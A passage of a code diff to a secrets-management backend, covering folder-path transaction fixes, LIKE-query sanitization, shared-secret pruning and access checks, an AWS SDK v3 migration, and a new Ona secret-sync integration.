(!folderWithFullPath) { - throw new NotFoundError({ - message: `Failed to retrieve path for folder with ID '${folder.id}'` - }); - } + return { ...doc, path: folderWithFullPath.path }; + }); await snapshotService.performSnapshot(folder.parentId as string); - return { ...folder, path: folderWithFullPath.path }; + return folder; }; const updateManyFolders = async ({ @@ -461,7 +461,17 @@ export const secretFolderServiceFactory = ({ } } - const newFolder = await folderDAL.transaction(async (tx) => { + const { newFolder, newFolderPath, oldFolderPath } = await folderDAL.transaction(async (tx) => { + // Read the old folder path BEFORE the update to capture the original name in the path. + // This must be done inside the transaction to ensure read-after-write consistency + // when using read replicas, but before the UPDATE to get the old state. + const [oldFolderWithPath] = await folderDAL.findSecretPathByFolderIds(projectId, [folder.id], tx); + if (!oldFolderWithPath) { + throw new NotFoundError({ + message: `Failed to retrieve path for folder with ID '${folder.id}'` + }); + } + const [doc] = await folderDAL.update( { envId: env.id, id: folder.id, parentId: parentFolder.id, isReserved: false }, { name, description }, @@ -498,30 +508,23 @@ export const secretFolderServiceFactory = ({ tx ); if (!doc) throw new NotFoundError({ message: `Failed to update folder with ID '${id}'`, name: "UpdateFolder" }); - return doc; - }); - const foldersWithFullPaths = await folderDAL.findSecretPathByFolderIds(projectId, [newFolder.id, folder.id]); - - const newFolderWithFullPath = foldersWithFullPaths.find((f) => f?.id === newFolder.id); - if (!newFolderWithFullPath) { - throw new NotFoundError({ - message: `Failed to retrieve path for folder with ID '${newFolder.id}'` - }); - } + // Read the new folder path AFTER the update to get the updated name in the path. 
+ const [newFolderWithPath] = await folderDAL.findSecretPathByFolderIds(projectId, [doc.id], tx); + if (!newFolderWithPath) { + throw new NotFoundError({ + message: `Failed to retrieve path for folder with ID '${doc.id}'` + }); + } - const folderWithFullPath = foldersWithFullPaths.find((f) => f?.id === folder.id); - if (!folderWithFullPath) { - throw new NotFoundError({ - message: `Failed to retrieve path for folder with ID '${folder.id}'` - }); - } + return { newFolder: doc, newFolderPath: newFolderWithPath.path, oldFolderPath: oldFolderWithPath.path }; + }); await snapshotService.performSnapshot(newFolder.parentId as string); await secretV2BridgeDAL.invalidateSecretCacheByProjectId(projectId); return { - folder: { ...newFolder, path: newFolderWithFullPath.path }, - old: { ...folder, path: folderWithFullPath.path } + folder: { ...newFolder, path: newFolderPath }, + old: { ...folder, path: oldFolderPath } }; }; @@ -900,7 +903,7 @@ export const secretFolderServiceFactory = ({ parentId: parentFolders.map((folder) => folder.id) }, isReserved: false, - $search: search ? { name: `%${search}%` } : undefined + $search: search ? 
{ name: search } : undefined }, { countDistinct: "name" } ); diff --git a/backend/src/services/secret-import/secret-import-dal.ts b/backend/src/services/secret-import/secret-import-dal.ts index ca1b06af6c8..68dc96b217e 100644 --- a/backend/src/services/secret-import/secret-import-dal.ts +++ b/backend/src/services/secret-import/secret-import-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TSecretImports } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify } from "@app/lib/knex"; import { EnvironmentInfo, FolderInfo, FolderResult, SecretResult } from "./secret-import-types"; @@ -86,7 +87,7 @@ export const secretImportDALFactory = (db: TDbClient) => { .where(filter) .where((bd) => { if (search) { - void bd.whereILike("importPath", `%${search}%`); + void bd.whereILike("importPath", `%${sanitizeSqlLikeString(search)}%`); } }) .join(TableName.Environment, `${TableName.SecretImport}.importEnv`, `${TableName.Environment}.id`) @@ -172,7 +173,7 @@ export const secretImportDALFactory = (db: TDbClient) => { .where("isReplication", false) .where((bd) => { if (search) { - void bd.whereILike("importPath", `%${search}%`); + void bd.whereILike("importPath", `%${sanitizeSqlLikeString(search)}%`); } }) .join(TableName.Environment, `${TableName.SecretImport}.importEnv`, `${TableName.Environment}.id`) @@ -191,7 +192,7 @@ export const secretImportDALFactory = (db: TDbClient) => { .where(`${TableName.SecretImport}.isReserved`, false) .where((bd) => { if (search) { - void bd.whereILike(`${TableName.SecretImport}.importPath`, `%${search}%`); + void bd.whereILike(`${TableName.SecretImport}.importPath`, `%${sanitizeSqlLikeString(search)}%`); } }) .join(TableName.Environment, `${TableName.SecretImport}.importEnv`, `${TableName.Environment}.id`) diff --git a/backend/src/services/secret-sharing/secret-sharing-dal.ts 
b/backend/src/services/secret-sharing/secret-sharing-dal.ts index 8f6cb80235f..7f5c3624bf7 100644 --- a/backend/src/services/secret-sharing/secret-sharing-dal.ts +++ b/backend/src/services/secret-sharing/secret-sharing-dal.ts @@ -1,7 +1,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; -import { TableName, TSecretSharing } from "@app/db/schemas"; +import { TableName } from "@app/db/schemas"; import { DatabaseError, NotFoundError } from "@app/lib/errors"; import { ormify, selectAllTableCols } from "@app/lib/knex"; import { logger } from "@app/lib/logger"; @@ -90,16 +90,13 @@ export const secretSharingDALFactory = (db: TDbClient) => { const pruneExpiredSharedSecrets = async (tx?: Knex) => { logger.info(`${QueueName.DailyResourceCleanUp}: pruning expired shared secret started`); try { - const today = new Date(); + const sevenDaysAgo = new Date(); + sevenDaysAgo.setDate(sevenDaysAgo.getDate() - 7); + const docs = await (tx || db)(TableName.SecretSharing) - .where("expiresAt", "<", today) - .andWhere("encryptedValue", "<>", "") + .where("expiresAt", "<", sevenDaysAgo) .andWhere("type", SecretSharingType.Share) - .update({ - encryptedValue: "", - tag: "", - iv: "" - }); + .del(); logger.info(`${QueueName.DailyResourceCleanUp}: pruning expired shared secret completed`); return docs; } catch (error) { @@ -110,12 +107,12 @@ export const secretSharingDALFactory = (db: TDbClient) => { const pruneExpiredSecretRequests = async (tx?: Knex) => { logger.info(`${QueueName.DailyResourceCleanUp}: pruning expired secret requests started`); try { - const today = new Date(); + const sevenDaysAgo = new Date(); + sevenDaysAgo.setDate(sevenDaysAgo.getDate() - 7); const docs = await (tx || db)(TableName.SecretSharing) .whereNotNull("expiresAt") - .andWhere("expiresAt", "<", today) - .andWhere("encryptedSecret", null) + .andWhere("expiresAt", "<", sevenDaysAgo) .andWhere("type", SecretSharingType.Request) .delete(); @@ -127,31 +124,18 @@ export const 
secretSharingDALFactory = (db: TDbClient) => { } }; - const findActiveSharedSecrets = async (filters: Partial, tx?: Knex) => { + const softDeleteById = async (id: string, tx?: Knex) => { try { - const now = new Date(); - return await (tx || db.replicaNode())(TableName.SecretSharing) - .where(filters) - .andWhere("expiresAt", ">", now) - .andWhere("encryptedValue", "<>", "") - .andWhere("type", SecretSharingType.Share) - .select(selectAllTableCols(TableName.SecretSharing)) - .orderBy("expiresAt", "asc"); - } catch (error) { - throw new DatabaseError({ - error, - name: "Find Active Shared Secrets" - }); - } - }; - - const softDeleteById = async (id: string) => { - try { - await sharedSecretOrm.updateById(id, { - encryptedValue: "", - iv: "", - tag: "" - }); + await sharedSecretOrm.updateById( + id, + { + encryptedValue: "", + iv: "", + tag: "", + encryptedSecret: null + }, + tx + ); } catch (error) { throw new DatabaseError({ error, @@ -166,7 +150,6 @@ export const secretSharingDALFactory = (db: TDbClient) => { pruneExpiredSharedSecrets, pruneExpiredSecretRequests, softDeleteById, - findActiveSharedSecrets, getSecretRequestById }; }; diff --git a/backend/src/services/secret-sharing/secret-sharing-service.ts b/backend/src/services/secret-sharing/secret-sharing-service.ts index 38ac0b89bf8..b6c2384b9f3 100644 --- a/backend/src/services/secret-sharing/secret-sharing-service.ts +++ b/backend/src/services/secret-sharing/secret-sharing-service.ts @@ -1,4 +1,5 @@ import { ForbiddenError } from "@casl/ability"; +import { Knex } from "knex"; import { OrganizationActionScope, TOrganizations, TSecretSharing } from "@app/db/schemas"; import { TLicenseServiceFactory } from "@app/ee/services/license/license-service"; @@ -10,6 +11,8 @@ import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, ForbiddenRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { ms } from "@app/lib/ms"; +import { 
requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor, SecretSharingAccessType } from "@app/lib/types"; import { ActorType } from "../auth/auth-type"; @@ -100,6 +103,10 @@ export const secretSharingServiceFactory = ({ } }; + // Checks whether external (non-org) email access is available for this secret. + const $hasExternalEmailAccess = (sharedSecret: TSecretSharing): boolean => + Boolean(sharedSecret.allowExternalEmails && sharedSecret.password); + const createSharedSecret = async ({ actor, actorId, @@ -611,8 +618,9 @@ export const secretSharingServiceFactory = ({ } const isAuthorizedUser = await $isAuthorizedEmailUser(sharedSecret, actorId); + const hasExternalEmailAccess = $hasExternalEmailAccess(sharedSecret); - if (!isAuthorizedUser && !sharedSecret.allowExternalEmails) { + if (!isAuthorizedUser && !hasExternalEmailAccess) { if (!actorId) { throw new UnauthorizedError({ message: "Authentication required to view this secret" }); } @@ -626,17 +634,17 @@ export const secretSharingServiceFactory = ({ }; }; - const $decrementSecretViewCount = async (sharedSecret: TSecretSharing) => { + const $decrementSecretViewCount = async (sharedSecret: TSecretSharing, tx?: Knex) => { const { expiresAfterViews } = sharedSecret; + let payload: { lastViewedAt: Date; $decr?: { expiresAfterViews: number } } = { + lastViewedAt: new Date() + }; if (expiresAfterViews) { - // decrement view count if view count expiry set - await secretSharingDAL.updateById(sharedSecret.id, { $decr: { expiresAfterViews: 1 } }); + payload = { ...payload, $decr: { expiresAfterViews: 1 } }; } - await secretSharingDAL.updateById(sharedSecret.id, { - lastViewedAt: new Date() - }); + await secretSharingDAL.updateById(sharedSecret.id, payload, tx); }; /** Gets password-less secret. validates all secret's requested (must be fresh). 
*/ @@ -644,10 +652,13 @@ export const secretSharingServiceFactory = ({ const result = await secretSharingDAL.transaction(async (tx) => { await tx.raw("SELECT pg_advisory_xact_lock(?)", [PgSqlLock.AccessSharedSecret(sharedSecretId)]); - const sharedSecret = await secretSharingDAL.findOne({ - type: SecretSharingType.Share, - identifier: Buffer.from(sharedSecretId, "base64url").toString("hex") - }); + const sharedSecret = await secretSharingDAL.findOne( + { + type: SecretSharingType.Share, + identifier: Buffer.from(sharedSecretId, "base64url").toString("hex") + }, + tx + ); if (!sharedSecret) { throw new NotFoundError({ @@ -666,8 +677,9 @@ export const secretSharingServiceFactory = ({ } const isAuthorizedUser = await $isAuthorizedEmailUser(sharedSecret, actorId); + const hasExternalEmailAccess = $hasExternalEmailAccess(sharedSecret); - if (!isAuthorizedUser && !sharedSecret.allowExternalEmails) { + if (!isAuthorizedUser && !hasExternalEmailAccess) { if (!actorId) { throw new UnauthorizedError({ message: "Authentication required to view this secret" }); } @@ -678,13 +690,13 @@ export const secretSharingServiceFactory = ({ // or can be safely sent to the client. 
if (expiresAt !== null && expiresAt < new Date()) { // check lifetime expiry - await secretSharingDAL.softDeleteById(sharedSecret.id); + await secretSharingDAL.softDeleteById(sharedSecret.id, tx); throw new NotFoundError({ message: "The shared secret has expired" }); } if (expiresAfterViews !== null && expiresAfterViews === 0) { // check view count expiry - await secretSharingDAL.softDeleteById(sharedSecret.id); + await secretSharingDAL.softDeleteById(sharedSecret.id, tx); throw new NotFoundError({ message: "The shared secret has reached its view limit" }); } @@ -716,11 +728,14 @@ export const secretSharingServiceFactory = ({ sharedSecret.orgId === orgId && sharedSecret.accessType === SecretSharingAccessType.Organization ) { - organization = await orgDAL.findOrgById(sharedSecret.orgId); + const sharedOrgId = sharedSecret.orgId; + organization = await requestMemoize(requestMemoKeys.orgFindOrgById(sharedOrgId), () => + orgDAL.findOrgById(sharedOrgId) + ); } // decrement when we are sure the user will view secret. 
- await $decrementSecretViewCount(sharedSecret); + await $decrementSecretViewCount(sharedSecret, tx); return { ...mapIdentifierToId(sharedSecret), @@ -817,7 +832,7 @@ export const secretSharingServiceFactory = ({ return null; } - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); const assets = await orgAssetDAL.listAssetsByType(orgId, ["brand-logo", "brand-favicon"]); const hasLogo = assets.some((a) => a.assetType === "brand-logo"); diff --git a/backend/src/services/secret-sync/aws-parameter-store/aws-parameter-store-sync-fns.ts b/backend/src/services/secret-sync/aws-parameter-store/aws-parameter-store-sync-fns.ts index bdef5d97fa7..695640f52bf 100644 --- a/backend/src/services/secret-sync/aws-parameter-store/aws-parameter-store-sync-fns.ts +++ b/backend/src/services/secret-sync/aws-parameter-store/aws-parameter-store-sync-fns.ts @@ -1,7 +1,27 @@ -import type { AWSError } from "aws-sdk"; -import SSM from "aws-sdk/clients/ssm.js"; +import { + AccessDeniedException, + AddTagsToResourceCommand, + type AddTagsToResourceCommandInput, + type AddTagsToResourceCommandOutput, + DeleteParametersCommand, + type DeleteParametersCommandOutput, + DescribeParametersCommand, + GetParametersByPathCommand, + ListTagsForResourceCommand, + type Parameter, + type ParameterMetadata, + PutParameterCommand, + type PutParameterCommandInput, + type PutParameterCommandOutput, + RemoveTagsFromResourceCommand, + type RemoveTagsFromResourceCommandInput, + type RemoveTagsFromResourceCommandOutput, + SSMClient, + type Tag +} from "@aws-sdk/client-ssm"; import handlebars from "handlebars"; +import { isAwsError } from "@app/lib/aws/error"; import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; import { SecretSyncError } from "@app/services/secret-sync/secret-sync-errors"; import { matchesSchema } from "@app/services/secret-sync/secret-sync-fns"; @@ -9,8 +29,8 
@@ import { TSecretMap } from "@app/services/secret-sync/secret-sync-types"; import { TAwsParameterStoreSyncWithCredentials } from "./aws-parameter-store-sync-types"; -type TAWSParameterStoreRecord = Record; -type TAWSParameterStoreMetadataRecord = Record; +type TAWSParameterStoreRecord = Record; +type TAWSParameterStoreMetadataRecord = Record; type TAWSParameterStoreTagsRecord = Record>; const MAX_RETRIES = 10; @@ -21,14 +41,10 @@ const getSSM = async (secretSync: TAwsParameterStoreSyncWithCredentials) => { const config = await getAwsConnectionConfig(connection, destinationConfig.region); - const ssm = new SSM({ - apiVersion: "2014-11-06", - region: destinationConfig.region + return new SSMClient({ + region: destinationConfig.region, + credentials: config.credentials }); - - ssm.config.update(config); - - return ssm; }; const sleep = async () => @@ -63,7 +79,7 @@ const getFullPath = ({ path, keySchema, environment }: { path: string; keySchema }; const getParametersByPath = async ( - ssm: SSM, + ssm: SSMClient, path: string, keySchema: string | undefined, environment: string @@ -78,15 +94,15 @@ const getParametersByPath = async ( while (hasNext) { try { // eslint-disable-next-line no-await-in-loop - const parameters = await ssm - .getParametersByPath({ + const parameters = await ssm.send( + new GetParametersByPathCommand({ Path: fullPath, Recursive: false, WithDecryption: true, MaxResults: BATCH_SIZE, NextToken: nextToken }) - .promise(); + ); attempt = 0; @@ -103,7 +119,7 @@ const getParametersByPath = async ( hasNext = Boolean(parameters.NextToken); nextToken = parameters.NextToken; } catch (e) { - if ((e as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(e, "ThrottlingException") && attempt < MAX_RETRIES) { attempt += 1; // eslint-disable-next-line no-await-in-loop await sleep(); @@ -119,7 +135,7 @@ const getParametersByPath = async ( }; const getParameterMetadataByPath = async ( - ssm: SSM, + ssm: SSMClient, path: string, 
keySchema: string | undefined, environment: string @@ -134,8 +150,8 @@ const getParameterMetadataByPath = async ( while (hasNext) { try { // eslint-disable-next-line no-await-in-loop - const parameters = await ssm - .describeParameters({ + const parameters = await ssm.send( + new DescribeParametersCommand({ MaxResults: 10, NextToken: nextToken, ParameterFilters: [ @@ -146,7 +162,7 @@ const getParameterMetadataByPath = async ( } ] }) - .promise(); + ); attempt = 0; @@ -163,7 +179,7 @@ const getParameterMetadataByPath = async ( hasNext = Boolean(parameters.NextToken); nextToken = parameters.NextToken; } catch (e) { - if ((e as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(e, "ThrottlingException") && attempt < MAX_RETRIES) { attempt += 1; // eslint-disable-next-line no-await-in-loop await sleep(); @@ -179,7 +195,7 @@ const getParameterMetadataByPath = async ( }; const getParameterStoreTagsRecord = async ( - ssm: SSM, + ssm: SSMClient, awsParameterStoreSecretsRecord: TAWSParameterStoreRecord, needsTagsPermissions: boolean ): Promise<{ shouldManageTags: boolean; awsParameterStoreTagsRecord: TAWSParameterStoreTagsRecord }> => { @@ -194,18 +210,20 @@ const getParameterStoreTagsRecord = async ( } try { - const tags = await ssm - .listTagsForResource({ + const tags = await ssm.send( + new ListTagsForResourceCommand({ ResourceType: "Parameter", ResourceId: parameter.Name }) - .promise(); + ); - awsParameterStoreTagsRecord[key] = Object.fromEntries(tags.TagList?.map((tag) => [tag.Key, tag.Value]) ?? []); + awsParameterStoreTagsRecord[key] = Object.fromEntries( + tags.TagList?.map((tag) => [tag.Key ?? "", tag.Value ?? ""]) ?? 
[] + ); } catch (e) { // users aren't required to provide tag permissions to use sync so we handle gracefully if unauthorized // and they aren't trying to configure tags - if ((e as AWSError).code === "AccessDeniedException") { + if (e instanceof AccessDeniedException) { if (!needsTagsPermissions) { return { shouldManageTags: false, awsParameterStoreTagsRecord: {} }; } @@ -231,7 +249,7 @@ const processParameterTags = ({ syncTagsRecord: Record; awsTagsRecord: Record; }) => { - const tagsToAdd: SSM.TagList = []; + const tagsToAdd: Tag[] = []; const tagKeysToRemove: string[] = []; for (const syncEntry of Object.entries(syncTagsRecord)) { @@ -249,14 +267,14 @@ const processParameterTags = ({ }; const putParameter = async ( - ssm: SSM, - params: SSM.PutParameterRequest, + ssm: SSMClient, + params: PutParameterCommandInput, attempt = 0 -): Promise => { +): Promise => { try { - return await ssm.putParameter(params).promise(); + return await ssm.send(new PutParameterCommand(params)); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -267,14 +285,14 @@ const putParameter = async ( }; const addTagsToParameter = async ( - ssm: SSM, - params: Omit, + ssm: SSMClient, + params: Omit, attempt = 0 -): Promise => { +): Promise => { try { - return await ssm.addTagsToResource({ ...params, ResourceType: "Parameter" }).promise(); + return await ssm.send(new AddTagsToResourceCommand({ ...params, ResourceType: "Parameter" })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -285,14 +303,14 @@ const addTagsToParameter = async ( }; const removeTagsFromParameter = async ( - ssm: SSM, - params: Omit, + ssm: SSMClient, + params: Omit, attempt = 0 -): Promise => { +): Promise => { try { 
- return await ssm.removeTagsFromResource({ ...params, ResourceType: "Parameter" }).promise(); + return await ssm.send(new RemoveTagsFromResourceCommand({ ...params, ResourceType: "Parameter" })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -303,11 +321,11 @@ const removeTagsFromParameter = async ( }; const deleteParametersBatch = async ( - ssm: SSM, - parameters: SSM.Parameter[], + ssm: SSMClient, + parameters: Parameter[], attempt = 0 -): Promise => { - const results: SSM.DeleteParameterResult[] = []; +): Promise => { + const results: DeleteParametersCommandOutput[] = []; let remainingParams = [...parameters]; while (remainingParams.length > 0) { @@ -315,11 +333,11 @@ const deleteParametersBatch = async ( try { // eslint-disable-next-line no-await-in-loop - const result = await ssm.deleteParameters({ Names: batch.map((param) => param.Name!) }).promise(); + const result = await ssm.send(new DeleteParametersCommand({ Names: batch.map((param) => param.Name!) 
})); results.push(result); remainingParams = remainingParams.slice(BATCH_SIZE); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { // eslint-disable-next-line no-await-in-loop await sleep(); @@ -442,7 +460,7 @@ export const AwsParameterStoreSyncFns = { if (syncOptions.disableSecretDeletion) return { createdSecretKeys, updatedSecretKeys, deletedSecretKeys }; - const parametersToDelete: SSM.Parameter[] = []; + const parametersToDelete: Parameter[] = []; for (const entry of Object.entries(awsParameterStoreSecretsRecord)) { const [key, parameter] = entry; @@ -488,7 +506,7 @@ export const AwsParameterStoreSyncFns = { environment!.slug ); - const parametersToDelete: SSM.Parameter[] = []; + const parametersToDelete: Parameter[] = []; for (const entry of Object.entries(awsParameterStoreSecretsRecord)) { const [key, param] = entry; diff --git a/backend/src/services/secret-sync/aws-secrets-manager/aws-secrets-manager-sync-fns.ts b/backend/src/services/secret-sync/aws-secrets-manager/aws-secrets-manager-sync-fns.ts index e3dede45451..13a62beee78 100644 --- a/backend/src/services/secret-sync/aws-secrets-manager/aws-secrets-manager-sync-fns.ts +++ b/backend/src/services/secret-sync/aws-secrets-manager/aws-secrets-manager-sync-fns.ts @@ -1,29 +1,27 @@ -import { UntagResourceCommandOutput } from "@aws-sdk/client-kms"; import { BatchGetSecretValueCommand, CreateSecretCommand, - CreateSecretCommandInput, + type CreateSecretCommandInput, + type CreateSecretResponse, DeleteSecretCommand, - DeleteSecretResponse, + type DeleteSecretResponse, DescribeSecretCommand, - DescribeSecretCommandInput, + type DescribeSecretCommandInput, + type DescribeSecretResponse, ListSecretsCommand, + type SecretListEntry, SecretsManagerClient, + type SecretValueEntry, + type Tag, TagResourceCommand, - TagResourceCommandOutput, + type TagResourceCommandOutput, UntagResourceCommand, 
+ type UntagResourceCommandOutput, UpdateSecretCommand, - UpdateSecretCommandInput + type UpdateSecretCommandInput } from "@aws-sdk/client-secrets-manager"; -import type { AWSError } from "aws-sdk"; -import { - CreateSecretResponse, - DescribeSecretResponse, - SecretListEntry, - SecretValueEntry, - Tag -} from "aws-sdk/clients/secretsmanager.js"; +import { isAwsError } from "@app/lib/aws/error"; import { CustomAWSHasher } from "@app/lib/aws/hashing"; import { crypto } from "@app/lib/crypto"; import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; @@ -89,7 +87,7 @@ const getSecretsRecord = async ( hasNext = Boolean(output.NextToken); nextToken = output.NextToken; } catch (e) { - if ((e as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(e, "ThrottlingException") && attempt < MAX_RETRIES) { attempt += 1; // eslint-disable-next-line no-await-in-loop await sleep(); @@ -141,7 +139,7 @@ const getSecretValuesRecord = async ( hasNext = Boolean(output.NextToken); nextToken = output.NextToken; } catch (e) { - if ((e as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(e, "ThrottlingException") && attempt < MAX_RETRIES) { attempt += 1; // eslint-disable-next-line no-await-in-loop await sleep(); @@ -165,7 +163,7 @@ const describeSecret = async ( try { return await client.send(new DescribeSecretCommand(input)); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -205,7 +203,7 @@ const createSecret = async ( try { return await client.send(new CreateSecretCommand(input)); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -223,7 +221,7 @@ const updateSecret = async ( 
try { return await client.send(new UpdateSecretCommand(input)); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -241,7 +239,7 @@ const deleteSecret = async ( try { return await client.send(new DeleteSecretCommand({ SecretId: secretKey, ForceDeleteWithoutRecovery: true })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -260,7 +258,7 @@ const addTags = async ( try { return await client.send(new TagResourceCommand({ SecretId: secretKey, Tags: tags })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry @@ -279,7 +277,7 @@ const removeTags = async ( try { return await client.send(new UntagResourceCommand({ SecretId: secretKey, TagKeys: tagKeys })); } catch (error) { - if ((error as AWSError).code === "ThrottlingException" && attempt < MAX_RETRIES) { + if (isAwsError(error, "ThrottlingException") && attempt < MAX_RETRIES) { await sleep(); // retry diff --git a/backend/src/services/secret-sync/ona/index.ts b/backend/src/services/secret-sync/ona/index.ts new file mode 100644 index 00000000000..343955c8781 --- /dev/null +++ b/backend/src/services/secret-sync/ona/index.ts @@ -0,0 +1,5 @@ +export * from "./ona-sync-constants"; +export * from "./ona-sync-enums"; +export * from "./ona-sync-fns"; +export * from "./ona-sync-schemas"; +export * from "./ona-sync-types"; diff --git a/backend/src/services/secret-sync/ona/ona-sync-constants.ts b/backend/src/services/secret-sync/ona/ona-sync-constants.ts new file mode 100644 index 00000000000..bf1d32430c4 --- /dev/null +++ 
b/backend/src/services/secret-sync/ona/ona-sync-constants.ts @@ -0,0 +1,11 @@ +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { TSecretSyncListItem } from "@app/services/secret-sync/secret-sync-types"; + +export const ONA_SYNC_LIST_OPTION: TSecretSyncListItem = { + name: "Ona", + destination: SecretSync.Ona, + connection: AppConnection.Ona, + canImportSecrets: false, + canRemoveSecretsOnDeletion: true +}; diff --git a/backend/src/services/secret-sync/ona/ona-sync-enums.ts b/backend/src/services/secret-sync/ona/ona-sync-enums.ts new file mode 100644 index 00000000000..511d91d2c59 --- /dev/null +++ b/backend/src/services/secret-sync/ona/ona-sync-enums.ts @@ -0,0 +1 @@ +export const ONA_PAGE_SIZE = 100; diff --git a/backend/src/services/secret-sync/ona/ona-sync-fns.ts b/backend/src/services/secret-sync/ona/ona-sync-fns.ts new file mode 100644 index 00000000000..404d29c39cb --- /dev/null +++ b/backend/src/services/secret-sync/ona/ona-sync-fns.ts @@ -0,0 +1,183 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { SecretSyncError } from "@app/services/secret-sync/secret-sync-errors"; +import { matchesSchema } from "@app/services/secret-sync/secret-sync-fns"; +import { TSecretMap } from "@app/services/secret-sync/secret-sync-types"; + +import { ONA_PAGE_SIZE } from "./ona-sync-enums"; +import { TOnaListSecretsResponse, TOnaSecret, TOnaSyncWithCredentials } from "./ona-sync-types"; + +const ONA_LIST_SECRETS_PATH = "/gitpod.v1.SecretService/ListSecrets"; +const ONA_CREATE_SECRET_PATH = "/gitpod.v1.SecretService/CreateSecret"; +const ONA_UPDATE_SECRET_VALUE_PATH = "/gitpod.v1.SecretService/UpdateSecretValue"; +const ONA_DELETE_SECRET_PATH = "/gitpod.v1.SecretService/DeleteSecret"; + +const ONA_MAX_RETRIES = 3; +const ONA_BASE_RETRY_DELAY_MS = 500; + +const ONA_API_URL = "https://app.gitpod.io/api"; + +const 
sleep = (ms: number) => + new Promise((resolve) => { + setTimeout(resolve, ms); + }); + +const isRetryableOnaError = (error: unknown): boolean => { + if (!(error instanceof AxiosError)) return false; + if (!error.response) return true; + const { status } = error.response; + return status === 429; +}; + +const withOnaRetry = async (fn: () => Promise): Promise => { + for (let attempt = 0; ; attempt += 1) { + try { + // eslint-disable-next-line no-await-in-loop + return await fn(); + } catch (error) { + if (attempt >= ONA_MAX_RETRIES || !isRetryableOnaError(error)) throw error; + // eslint-disable-next-line no-await-in-loop + await sleep(ONA_BASE_RETRY_DELAY_MS * 2 ** attempt); + } + } +}; + +const getAuthHeaders = (secretSync: TOnaSyncWithCredentials) => ({ + Authorization: `Bearer ${secretSync.connection.credentials.personalAccessToken}`, + "Content-Type": "application/json" +}); + +const listEnvVarSecrets = async (secretSync: TOnaSyncWithCredentials): Promise => { + const all: TOnaSecret[] = []; + let token: string | undefined; + let hasMore = true; + + while (hasMore) { + // eslint-disable-next-line no-await-in-loop, @typescript-eslint/no-loop-func + const { data } = await withOnaRetry(async () => { + return request.post( + `${ONA_API_URL}${ONA_LIST_SECRETS_PATH}`, + { + filter: { scope: { projectId: secretSync.destinationConfig.projectId } }, + pagination: { pageSize: ONA_PAGE_SIZE, ...(token ? 
{ token } : {}) } + }, + { headers: getAuthHeaders(secretSync) } + ); + }); + + if (data?.secrets?.length) all.push(...data.secrets); + + token = data?.pagination?.nextToken || undefined; + hasMore = Boolean(token); + } + + return all.filter((secret) => secret.environmentVariable === true); +}; + +const createEnvVarSecret = async (secretSync: TOnaSyncWithCredentials, name: string, value: string): Promise => { + await withOnaRetry(async () => { + return request.post( + `${ONA_API_URL}${ONA_CREATE_SECRET_PATH}`, + { + name, + value, + scope: { projectId: secretSync.destinationConfig.projectId }, + environmentVariable: true + }, + { headers: getAuthHeaders(secretSync) } + ); + }); +}; + +const updateSecretValue = async ( + secretSync: TOnaSyncWithCredentials, + secretId: string, + value: string +): Promise => { + await withOnaRetry(async () => { + return request.post( + `${ONA_API_URL}${ONA_UPDATE_SECRET_VALUE_PATH}`, + { secretId, value }, + { headers: getAuthHeaders(secretSync) } + ); + }); +}; + +const deleteSecret = async (secretSync: TOnaSyncWithCredentials, secretId: string): Promise => { + await withOnaRetry(async () => { + return request.post( + `${ONA_API_URL}${ONA_DELETE_SECRET_PATH}`, + { secretId }, + { headers: getAuthHeaders(secretSync) } + ); + }); +}; + +export const OnaSyncFns = { + syncSecrets: async (secretSync: TOnaSyncWithCredentials, secretMap: TSecretMap) => { + const existingSecrets = await listEnvVarSecrets(secretSync); + const existingByName = new Map(existingSecrets.map((s) => [s.name, s])); + + for (const key of Object.keys(secretMap)) { + const prior = existingByName.get(key); + try { + if (!prior) { + // eslint-disable-next-line 